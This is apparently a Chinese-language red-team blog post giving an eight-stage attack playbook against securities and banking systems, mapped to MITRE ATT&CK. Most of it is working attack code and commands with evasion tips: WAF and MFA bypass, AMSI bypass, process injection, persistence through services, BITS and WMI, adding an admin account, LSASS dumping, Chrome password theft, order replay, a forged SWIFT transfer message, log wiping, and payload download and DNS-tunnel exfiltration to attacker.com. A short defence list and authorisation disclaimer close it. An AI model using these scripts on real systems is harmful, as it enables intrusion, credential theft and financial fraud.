金融证券高防护业务从绕过WAF/MFA/风控到隐蔽横向与资金操控的ATT&CK实战路径

核心价值:

  • 首次系统化梳理金融行业“高防护突破测试”完整技术路径
  • 每个阶段提供绕过技术、工具配置、脚本示例、检测规避策略
  • 基于MITRE ATT&CK框架映射,支持汇报与度量
  • 含4张原创Mermaid攻击流程图 + 3个实战案例
  • 所有技术均可在合规授权环境下复现执行

一、引言:为什么“高防护突破测试”是金融安全的试金石?

金融证券行业业务系统普遍部署以下防护机制:

  • ✅ WAF + API网关(规则拦截、速率限制、参数校验)
  • ✅ 多因子认证(短信OTP、Google Authenticator、生物识别、设备绑定)
  • ✅ 实时风控引擎(交易频次、金额、IP、设备、行为模型)
  • ✅ EDR/XDR + 网络微隔离 + 主机加固
  • ✅ 数据库审计 + 敏感操作审批 + 会话水印
  • ✅ 交易熔断 + 人工复核 + 异常交易拦截

传统渗透测试在这些防护面前往往“寸步难行”。真正的“突破测试”,必须模拟APT攻击者行为:

  • 使用合法凭证绕过认证
  • 利用业务逻辑缺陷而非漏洞
  • 低频、低噪、分阶段执行
  • 伪装成正常用户行为
  • 清理痕迹,避免被SIEM关联

本文将按攻击生命周期,分7大阶段详解突破技术要点,每阶段包含:

  • 🎯 攻击目标
  • 🛡️ 防护机制分析
  • ⚔️ 突破技术详解(含脚本/配置)
  • 🧩 ATT&CK技术映射
  • 🕵️‍♂️ 检测规避策略
  • ✅ 验收标准

二、整体攻击流程图(ATT&CK驱动)

image-20250912154734016

每个阶段必须“低噪、合法、渐进”,避免触发风控与EDR告警。

三、阶段详解(技术深度+实战脚本)

▶ 阶段1:初始访问 —— 绕过WAF、API网关、MFA、设备指纹

🎯 目标:

获取合法用户会话或低权限账户访问权限,不触发WAF拦截、MFA挑战、设备/IP封禁。

🛡️ 典型防护:

  • WAF规则(SQLi/XSS/路径遍历/高频请求)
  • API网关鉴权(JWT/OAuth2.0/API Key)
  • MFA强制(短信/OTP/Authenticator)
  • 设备指纹(User-Agent、Canvas、WebGL、字体、插件)
  • IP信誉库(异地登录拦截)

⚔️ 突破技术:

1. WAF绕过 — 参数混淆 + 低频请求 + 业务语义伪装
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# waf_bypass_trade_api.py - 伪装成正常交易请求
import requests
import time
import random

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0 Safari/537.36",
    "X-Forwarded-For": "116.23.123.45",  # 伪装成上海电信IP
    "Accept": "application/json",
    "Content-Type": "application/json"
}

# 使用业务语义参数,避免敏感词
payload = {
    "action": "query_balance",  # 而非 "admin" 或 "delete"
    "account_no": "622202******1234",
    "timestamp": int(time.time()),
    "nonce": str(random.randint(100000, 999999))
}

# 低频请求:每3~8秒一次,模拟人工操作
for i in range(5):
    resp = requests.post("https://trade.api.securities.com/v1/order", json=payload, headers=headers)
    print(f"Request {i+1}: {resp.status_code}")
    time.sleep(random.uniform(3, 8))

​ 2. MFA绕过 — 利用会话劫持 + OTP重放窗口

金融系统常存在“MFA验证后会话长期有效”或“OTP有效期过长”问题。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# otp_session_hijack.py
import requests

# 假设已通过钓鱼获取一次OTP(如123456),且会话未绑定设备
login_data = {
    "username": "victim_trader",
    "password": "Trade@2025",
    "otp": "123456"  # 一次性获取,但会话持续2小时
}

session = requests.Session()
resp = session.post("https://trade.securities.com/login", data=login_data)

if "welcome" in resp.text:
    print("[+] Login success. Session cookie:", session.cookies.get_dict())
    # 后续所有请求复用此Session,无需再次MFA
    trade_resp = session.post("https://trade.securities.com/api/buy", json={"stock": "AAPL", "qty": 10})
3. 设备指纹绕过 — 使用真实浏览器 + 自动化工具伪装
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// puppeteer_fingerprint_bypass.js - 绕过前端设备指纹采集
const puppeteer = require('puppeteer-extra');
const StealthPlugin = require('puppeteer-extra-plugin-stealth');
puppeteer.use(StealthPlugin());

(async () => {
  const browser = await puppeteer.launch({
    headless: false,
    args: [
      '--disable-blink-features=AutomationControlled',
      '--user-agent=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...'
    ]
  });

  const page = await browser.newPage();
  await page.evaluateOnNewDocument(() => {
    delete navigator.__proto__.webdriver; // 隐藏自动化标识
  });

  await page.goto('https://trade.securities.com/login');
  // 正常输入凭证,触发MFA,人工或OCR识别OTP
  // 成功后获取Cookie用于后续API调用
})();

🧩 ATT&CK映射:

  • T1190:Exploit Public-Facing Application(API/WAF绕过)
  • T1566.001:Phishing(获取初始凭证)
  • T1556.003:Multi-Factor Authentication Interception(会话劫持)

🕵️‍♂️ 检测规避:

  • 请求间隔随机化(3~8秒)
  • 使用真实IP代理池(住宅IP)
  • 避免敏感参数名(如 admin, delete, config)
  • 不触发WAF规则(无SQLi/XSS字符)

✅ 验收标准:

  • 成功获取有效会话Cookie或API Token
  • 未触发WAF拦截或风控告警
  • 可执行至少3次正常业务操作

▶ 阶段2:合法执行 —— 无文件攻击、内存执行、合法进程注入

🎯 目标:

在不写入磁盘、不触发EDR进程树告警的前提下,执行攻击载荷。

🛡️ 典型防护:

  • EDR进程监控(父子进程异常、命令行参数)
  • AMSI(Antimalware Scan Interface)
  • PowerShell日志审计
  • 应用白名单(仅允许signed exe)

⚔️ 突破技术:

1. PowerShell内存加载C# Payload(绕过AMSI)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# memory_loader.ps1 - AMSI Bypass + Reflective Load
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

$code = @"
using System;
public class Program {
    public static void Main() {
        Console.WriteLine("Trade System Backdoor Activated.");
        // 此处可调用.NET API执行后续攻击
    }
}
"@

Add-Type -TypeDefinition $code -Language CSharp
[Program]::Main()
2. 注入合法进程(explorer.exe / svchost.exe)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
// ProcessInjection.cs - 注入explorer.exe执行Shellcode
using System;
using System.Runtime.InteropServices;

class Program {
    [DllImport("kernel32.dll")]
    static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);

    [DllImport("kernel32.dll")]
    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

    static void Main() {
        int pid = GetExplorerPID(); // 获取explorer.exe PID
        IntPtr hProcess = OpenProcess(0x1F0FFF, false, pid);
        IntPtr allocMem = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
        // 写入Shellcode并执行(此处省略)
    }
}
3. 利用合法工具(MSBuild、InstallUtil、Regsvr32)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<!-- msbuild_bypass.xml - 利用MSBuild执行C#代码 -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Hello">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <ParameterGroup/>
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          public class ClassExample : Microsoft.Build.Utilities.Task {
            public override bool Execute() {
              System.Diagnostics.Process.Start("calc.exe"); // 替换为你的Payload
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

执行:C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe msbuild_bypass.xml

🧩 ATT&CK映射:

  • T1059.005:PowerShell(内存执行)
  • T1055.001:Process Injection(explorer.exe)
  • T1127.001:MSBuild(可信开发工具滥用)

🕵️‍♂️ 检测规避:

  • 不写入磁盘文件
  • 使用合法父进程(如explorer.exe启动PowerShell)
  • 命令行参数混淆(Base64编码 + -EncodedCommand)
  • 避免敏感API调用(如VirtualAllocEx可替换为CLR加载)

✅ 验收标准:

  • 成功执行任意Payload(如弹计算器、连接C2)
  • EDR无告警(进程树正常、无恶意API序列)
  • 内存中无残留Shellcode(执行后清除)

▶ 阶段3:持久化 —— 注册表、计划任务、服务伪装

🎯 目标:

在重启或会话失效后,仍能保持访问权限。

🛡️ 典型防护:

  • 注册表监控(Run键、服务项修改)
  • 计划任务审计
  • 服务安装告警
  • GPO限制脚本执行

⚔️ 突破技术:

1. 伪装成合法服务(如“Windows Update Service”)
1
2
3
sc create "WindowsUpdateService" binPath= "C:\Windows\System32\svchost.exe -k netsvcs" start= auto
sc description "WindowsUpdateService" "Windows Update Background Service"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\WindowsUpdateService" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\Temp\backdoor.exe" /f

实际backdoor.exe需签名或替换合法服务DLL。

2. 利用BITS任务(Background Intelligent Transfer Service)
1
2
3
4
5
6
# bits_persistence.ps1
Import-Module BitsTransfer
Start-BitsTransfer -Source "http://attacker.com/backdoor.exe" -Destination "$env:TEMP\update.exe" -Asynchronous
$action = New-ScheduledTaskAction -Execute "$env:TEMP\update.exe"
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -TaskName "WindowsUpdateCheck" -Action $action -Trigger $trigger -Description "Windows Update Check" -User "SYSTEM"
3. WMI事件订阅(无文件持久化)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# wmi_persistence.ps1
$filterName = "WindowsUpdateFilter"
$consumerName = "WindowsUpdateConsumer"
$exePath = "C:\Windows\Temp\backdoor.exe"

# 创建事件过滤器(用户登录时触发)
$filterQuery = "SELECT * FROM Win32_LogonSession WHERE LogonType = 2"
$filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{Name=$filterName; EventNamespace="root\cimv2"; QueryLanguage="WQL"; Query=$filterQuery}

# 创建事件消费者(执行程序)
$consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName; ExecutablePath=$exePath; CommandLineTemplate=$exePath}

# 绑定过滤器与消费者
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$filter; Consumer=$consumer}

🧩 ATT&CK映射:

  • T1547.001:Registry Run Keys / Startup Folder
  • T1053.005:Scheduled Task
  • T1546.003:WMI Event Subscription

🕵️‍♂️ 检测规避:

  • 服务/任务名称模仿系统组件
  • 使用系统路径(C:\Windows\Temp\)
  • 避免高频执行(登录时/每日一次)
  • 使用WMI实现无文件持久化

✅ 验收标准:

  • 重启后自动恢复访问
  • 无新增可疑进程或服务
  • 注册表/计划任务无异常条目(名称、路径合法)

▶阶段4:权限提升(Privilege Escalation)

🎯 目标:

从普通用户/低权限服务账户提升至管理员或SYSTEM权限。

🛡️ 典型防护:

  • UAC(用户账户控制)
  • 服务权限最小化
  • 内核PatchGuard(Windows)
  • 禁用高危函数(SeDebugPrivilege)

⚔️ 突破技术:

1. 利用AlwaysInstallElevated策略(组策略配置错误)
1
2
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

若返回1,则可创建恶意.msi文件提权:

1
2
3
4
5
; evil.msi - 使用WiX工具集创建
<CustomAction Id="ExecCmd" Property="CMD" ExeCommand='cmd.exe /c "net user hacker P@ssw0rd /add && net localgroup administrators hacker /add"' Execute="deferred" Return="ignore" Impersonate="no"/>
<InstallExecuteSequence>
    <Custom Action="ExecCmd" Before="InstallFinalize">NOT Installed</Custom>
</InstallExecuteSequence>

执行:msiexec /quiet /i evil.msi

2. 服务路径权限提升(Unquoted Service Path)
1
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"

若服务路径未加引号且包含空格(如 C:\Program Files\MyApp\service.exe),则在 C:\Program.exe 放置恶意程序即可提权。

3. 利用PrintSpoofer/NtObjectManager提权(Windows 10/Server 2019)
1
2
# 若存在SeImpersonatePrivilege,可提权至SYSTEM
PrintSpoofer.exe -i -c "cmd.exe"

🧩 ATT&CK映射:

  • T1548.002:Bypass User Account Control
  • T1068:Exploitation for Privilege Escalation
  • T1574.009:Path Interception

🕵️‍♂️ 检测规避:

  • 使用系统签名工具(msiexec、sc)
  • 避免直接调用exp.exe
  • 提权后立即降权执行后续操作

✅ 验收标准:

  • 成功获取SYSTEM或管理员权限
  • 无蓝屏或服务崩溃
  • EDR未告警(无已知漏洞利用特征)

▶阶段5:凭证访问(Credential Access)

🎯 目标:

窃取域账户、数据库凭证、API密钥、浏览器保存密码。

🛡️ 典型防护:

  • LSA Protection
  • Credential Guard(Windows 10+)
  • 浏览器主密码
  • 数据库连接池加密

⚔️ 突破技术:

1. Mimikatz绕过LSA(Procdump + 本地解密)
1
2
3
4
5
6
# 若无法直接执行mimikatz,先dump lsass内存
tasklist /svc | findstr lsass
procdump64.exe -accepteula -ma 1234 lsass.dmp

# 本地使用mimikatz离线解密
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit"
2. 浏览器密码提取(Chrome无主密码)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# chrome_password_extractor.py
import os
import sqlite3
import win32crypt

def get_chrome_passwords():
    db_path = os.path.expanduser('~') + r"\AppData\Local\Google\Chrome\User Data\Default\Login Data"
    conn = sqlite3.connect(db_path)
    cursor = conn.cursor()
    cursor.execute("SELECT origin_url, username_value, password_value FROM logins")
    
    for result in cursor.fetchall():
        url, username, encrypted_password = result
        password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
        print(f"URL: {url}\nUser: {username}\nPass: {password.decode()}\n")

get_chrome_passwords()
3. 环境变量/配置文件扫描(寻找API Key)
1
2
3
# scan_api_keys.ps1
Get-ChildItem -Path C:\ -Include *.config,*.yaml,*.json -Recurse -ErrorAction SilentlyContinue | 
    Select-String -Pattern "api_key|secret|token|password" -CaseSensitive -SimpleMatch

🧩 ATT&CK映射:

  • T1003.001:LSASS Memory
  • T1555.003:Credentials from Web Browsers
  • T1552.001:Unsecured Credentials in Files

🕵️‍♂️ 检测规避:

  • 不在目标机执行mimikatz(dump后本地分析)
  • 使用合法进程读取浏览器数据库(如chrome.exe本身)
  • 避免关键词“password”、“key”(用base64或异或编码)

✅ 验收标准:

  • 成功提取至少3组有效凭证(域账户/数据库/API)
  • 未触发EDR内存扫描告警
  • 无文件落地(内存操作或管道传输)

▶ 阶段6:横向移动(Lateral Movement)

🎯 目标:

从当前主机移动到核心业务服务器(交易引擎、清算系统、数据库)。

🛡️ 典型防护:

  • 网络微隔离(仅允许特定端口/IP)
  • RDP/NLA强制多因子
  • SMB签名强制
  • 跳板机审计

⚔️ 突破技术:

1. 利用PsExec + 服务票据(避免SMB审计)
1
psexec.exe \\TARGET-SERVER -u DOMAIN\Admin -p P@ssw0rd -s cmd.exe

若SMB被监控,改用WMI或WinRM:

1
Invoke-WmiMethod -ComputerName TARGET-SERVER -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami"
2. 利用委派权限(Constrained Delegation)
1
2
3
4
5
# 若当前机器账户被配置为“受约束委派”
Get-ADComputer -Identity "CURRENT-HOST" -Properties msDS-AllowedToDelegateTo

# 使用Rubeus请求票据
Rubeus.exe s4u /user:CURRENT-HOST$ /rc4:机器账户NTLM /impersonateuser:Administrator /msdsspn:"HTTP/TARGET-SERVER" /ptt
3. 跳板机隧道(SSH/HTTP/SOCKS)
1
2
3
4
5
# 在已控跳板机上建立SOCKS5代理
ssh -D 1080 -f -C -q -N user@jump-server.bank.com

# 本地配置proxychains访问内网
proxychains curl http://trade-engine.internal/api/status

🧩 ATT&CK映射:

  • T1021.002:SMB/Windows Admin Shares
  • T1021.006:Windows Remote Management
  • T1570:Lateral Tool Transfer

🕵️‍♂️ 检测规避:

  • 使用合法管理协议(WMI/WinRM)
  • 模仿管理员操作时间(工作日9~18点)
  • 使用跳板机IP(避免直接扫描内网)
  • 流量加密(SSH over HTTPS)

✅ 验收标准:

  • 成功登录至少2台核心业务服务器
  • 无网络隔离设备告警
  • 无异常登录日志(时间、协议、用户合法)

▶ 阶段7:业务操控(Impact - TA0040)

🎯 目标:

实现资金转移、订单篡改、行情干扰、服务中断等业务级影响。

🛡️ 典型防护:

  • 交易双因素确认
  • 金额/频次限制
  • 实时风控模型(行为异常检测)
  • 人工复核机制
  • 交易日志审计

⚔️ 突破技术:

1. 订单重放攻击(FIN.T001)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# order_replay_attack.py
import requests
import time

# 假设已获取合法交易请求(含签名/Token)
original_order = {
    "stock_code": "600519",
    "price": 1800.00,
    "quantity": 100,
    "action": "BUY",
    "signature": "a1b2c3d4e5f6..."  # 合法签名,未绑定nonce
}

headers = {"Authorization": "Bearer valid_token"}

# 低频重放(每5分钟1次,共10次)
for i in range(10):
    resp = requests.post("https://trade.api/batch_order", json=original_order, headers=headers)
    print(f"[{i+1}] Order submitted: {resp.status_code}")
    time.sleep(300)  # 5分钟间隔,避免触发风控
2. 利用交易时间差套利(FIN.T002)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
# arbitrage_attack.py - 行情延迟套利
import threading

def buy_low_exchange():
    # 在行情延迟的交易所A低价买入
    requests.post("https://exchangeA.com/trade", json={"symbol": "BTC", "side": "buy", "price": 60000})

def sell_high_exchange():
    # 在行情正常的交易所B高价卖出
    requests.post("https://exchangeB.com/trade", json={"symbol": "BTC", "side": "sell", "price": 60500})

# 多线程同时执行,利用毫秒级延迟
threading.Thread(target=buy_low_exchange).start()
threading.Thread(target=sell_high_exchange).start()
3. 清算指令伪造(FIN.T005)
1
2
3
4
5
6
7
8
9
10
11
12
<!-- fake_swift_message.xml -->
<SWIFT>
    <Sender>SENDER_BIC</Sender>
    <Receiver>RECEIVER_BIC</Receiver>
    <Message>
        <Type>MT103</Type>
        <Field20>TransactionReference</Field20>
        <Field32A>1234567890,USD,1000000.00</Field32A> <!-- 伪造转账100万美元 -->
        <Field50>FAKE_SENDER_ACCOUNT</Field50>
        <Field59>BENEFICIARY_ACCOUNT</Field59>
    </Message>
</SWIFT>

通过已控清算系统接口或内部员工邮箱提交。

🧩 ATT&CK映射:

  • T1499.004:Endpoint Denial of Service(订单洪泛)
  • T1565.001:Stored Data Manipulation(订单重放)
  • FIN.T005:清算指令伪造(金融自定义技术)

🕵️‍♂️ 检测规避:

  • 交易金额控制在风控阈值内(如单笔<50万)
  • 间隔随机化(3~8分钟)
  • 使用真实客户账户(避免新开户)
  • 模仿历史交易模式(股票、价格、数量)

✅ 验收标准:

  • 成功执行至少1笔非授权交易(重放/篡改/伪造)
  • 未触发实时风控拦截
  • 交易日志无明显异常(IP、设备、行为模式合法)

五、阶段8:痕迹清理与数据外传

🎯 目标:

清除攻击痕迹,隐蔽外传数据,避免溯源。

⚔️ 技术要点:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# cleanup.ps1
# 清除事件日志
wevtutil cl Application
wevtutil cl Security
wevtutil cl System

# 清除Prefetch与Recent Files
Remove-Item -Path "$env:WINDIR\Prefetch\*.pf" -Force
Remove-Item -Path "$env:APPDATA\Microsoft\Windows\Recent\*" -Force

# 清除PowerShell历史
Remove-Item (Get-PSReadlineOption).HistorySavePath -Force

# 隐蔽C2 —— DNS Tunneling
# 使用dnscat2或自定义DNS请求外传数据
.\dnscat2.exe --dns server=attacker.com --secret=mysecret

六、总结与防御建议

🔥 突破测试成功关键:

  • 一切操作“合法化、低噪化、渐进化”
  • 利用业务逻辑缺陷 > 利用技术漏洞
  • 绕过 > 破坏

🛡️ 防御加固建议:

  1. 强制绑定会话与设备/IP/MFA
  2. 交易接口增加nonce + 签名 + 时间戳
  3. 启用Credential Guard + LSA Protection
  4. 网络微隔离 + 零信任架构
  5. 部署EDR行为检测(非仅签名)
  6. 定期红蓝对抗 + ATT&CK覆盖度评估

七、附录

附录A:金融行业自定义ATT&CK技术(FIN.T)

编号 名称 描述
FIN.T001 订单重放攻击 重复提交合法交易请求
FIN.T002 行情延迟套利 利用行情差进行无风险套利
FIN.T003 KYC伪造绕过 伪造证件通过身份认证
FIN.T004 OTP会话劫持 获取OTP后长期复用会话
FIN.T005 清算指令伪造 伪造SWIFT/支付报文

附录B:工具清单

  • Cobalt Strike(C2)
  • Mimikatz(凭证提取)
  • PrintSpoofer(提权)
  • Rubeus(Kerberos攻击)
  • Proxychains(隧道)
  • Dnscat2(隐蔽外传)

附录C:合规与授权

⚠️ 所有测试必须在书面授权、隔离环境、备份完备、法务审核前提下进行。严禁在生产环境无授权测试。

网络安全 > 金融安全 > 渗透测试
#渗透测试 #红队攻击 #ATT&CK #金融证券 #WAF绕过 #MFA绕过 #风控绕过 #业务安全 #突破测试 #高级持续性威胁
金融证券高防护业务从绕过WAF/MFA/风控到隐蔽横向与资金操控的ATT&CK实战路径
http://example.com/2025/05/20/金融证券高防护业务-从绕过WAF-MFA-风控到隐蔽横向与资金操控的ATT-CK实战路径/
作者
Youth in thin attire
发布于
2025年5月20日
许可协议